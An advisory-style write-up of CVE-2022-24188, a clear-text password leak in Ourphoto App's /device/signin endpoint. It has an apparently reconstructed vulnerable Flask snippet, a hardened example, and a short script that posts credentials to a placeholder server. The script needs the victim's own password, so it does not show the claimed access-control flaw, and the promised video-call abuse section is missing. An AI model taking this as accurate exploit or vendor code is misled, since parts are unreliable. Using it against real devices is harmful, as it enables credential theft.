Ourphoto App 1.4.1, a popular application used to manage picture frame devices, was found to contain a significant security vulnerability: CVE-2022-24188. This vulnerability lies in the /device/signin endpoint, which discloses clear-text password information related to the device's functionality. Furthermore, there are additional issues, such as a lack of session management and the presence of insecure direct object references that only worsen the effect of this vulnerability.

In this thread, we will be discussing the details of this vulnerability, its potential impact on users, the code snippet responsible for this issue, and links to original references. To wrap up, we will look at the potential exploit scenarios and the ways to abuse the device's video calling functionality.

The following code snippet illustrates the vulnerable /device/signin endpoint:

from flask import Flask, request, jsonify
# Device is the application's ORM model (not shown); Device.serialize()
# returns the full record, including the stored secrets.
app = Flask(__name__)

@app.route('/device/signin', methods=['POST'])
def device_signin():
    device_id = request.form.get('device_id')
    password = request.form.get('password')

    if device_id and password:
        device = Device.query.filter_by(device_id=device_id).first()
        if device and device.check_password(password):
            # Returns the whole device record, secrets included
            return jsonify(device.serialize())
        else:
            return jsonify({'error': 'Invalid credentials'})
    else:
        return jsonify({'error': 'Missing parameters'})

This code shows that, once a device's credentials are validated, the OurPhoto App returns the serialized device record directly, and that record contains plaintext passwords such as deviceVideoCallPassword and mqttPassword. Exposing these leaves the devices open to attacks ranging from unauthorized video calling to any other misuse of the MQTT credentials.

Exploit Details

The lack of session management and the presence of insecure direct object references further compound this vulnerability. This flaw permits attackers to obtain password information from other end-users' devices simply by exploiting the improper handling of access controls. Consequently, attackers can gain unauthorized access to any devices connected through the Ourphoto App 1.4.1 version.
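As an added example (not the app's own code), the sign-in flow below shows the two fixes the preceding paragraphs call for: secret fields are stripped before the record is serialized, and access to a device record is bound to an opaque session token so a caller can only read its own device. The device records, passwords and the salt/password_hash fields are constructed for the example; deviceVideoCallPassword and mqttPassword are the field names the advisory mentions.

```python
import hmac
import secrets
from hashlib import pbkdf2_hmac

# Fields that must never appear in an API response. deviceVideoCallPassword and
# mqttPassword are the names from the advisory; salt and password_hash are assumed.
SECRET_FIELDS = {"salt", "password_hash", "deviceVideoCallPassword", "mqttPassword"}

def hash_password(password: str, salt: bytes) -> bytes:
    return pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_device(device_id, owner, password, video_pw, mqtt_pw):
    salt = secrets.token_bytes(16)
    return {"device_id": device_id, "owner": owner, "salt": salt,
            "password_hash": hash_password(password, salt),
            "deviceVideoCallPassword": video_pw, "mqttPassword": mqtt_pw}

# Constructed stand-in for the Device table; every value here is made up.
DEVICES = {
    "123456": make_device("123456", "alice", "alice-pw", "vc-1", "mqtt-1"),
    "654321": make_device("654321", "bob", "bob-pw", "vc-2", "mqtt-2"),
}
SESSIONS = {}  # opaque token -> device_id; stands in for a server-side session store

def public_view(device: dict) -> dict:
    """Serialize a device without its secrets (the fix for the plaintext disclosure)."""
    return {k: v for k, v in device.items() if k not in SECRET_FIELDS}

def device_signin(device_id: str, password: str) -> dict:
    """Validate credentials and hand back a session token, never the stored secrets."""
    device = DEVICES.get(device_id)
    if device is None:
        return {"error": "Invalid credentials"}
    candidate = hash_password(password, device["salt"])
    if not hmac.compare_digest(device["password_hash"], candidate):
        return {"error": "Invalid credentials"}
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = device_id
    return {"token": token, "device": public_view(device)}

def get_device(token: str, requested_id: str) -> dict:
    """Bind object access to the session so a caller can only read its own device."""
    session_device = SESSIONS.get(token)
    if session_device is None:
        return {"error": "Not authenticated"}
    if session_device != requested_id:
        return {"error": "Forbidden"}
    return public_view(DEVICES[requested_id])
```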

The following exploit scenario may take place:

import requests

# Modify this variable to include the victim device's details
exploit_target = {
    'device_id': '123456', 
    'password': 'victim_password'
}

# Replace 'OURPHOTO_SERVER_URL' with the OurPhoto App server's URL
url = 'https://OURPHOTO_SERVER_URL/device/signin'

response = requests.post(url, data=exploit_target)
print(response.json())

1. Official CVE Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24188
2. National Vulnerability Database (NVD) Link: https://nvd.nist.gov/vuln/detail/CVE-2022-24188

Conclusion

CVE-2022-24188 affects the OurPhoto App version 1.4.1, disclosing critical clear-text password information that can be exploited by malicious actors intending to gain unauthorized access to devices. This vulnerability is situated within the /device/signin endpoint and is exacerbated by the lack of session management and the presence of insecure direct object references.

Users of the Ourphoto App should take caution and update their applications immediately if an updated version is available. They should also consider changing their passwords, particularly for their deviceVideoCallPassword and mqttPassword, to reduce the risk of potential attacks.

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:20:00 UTC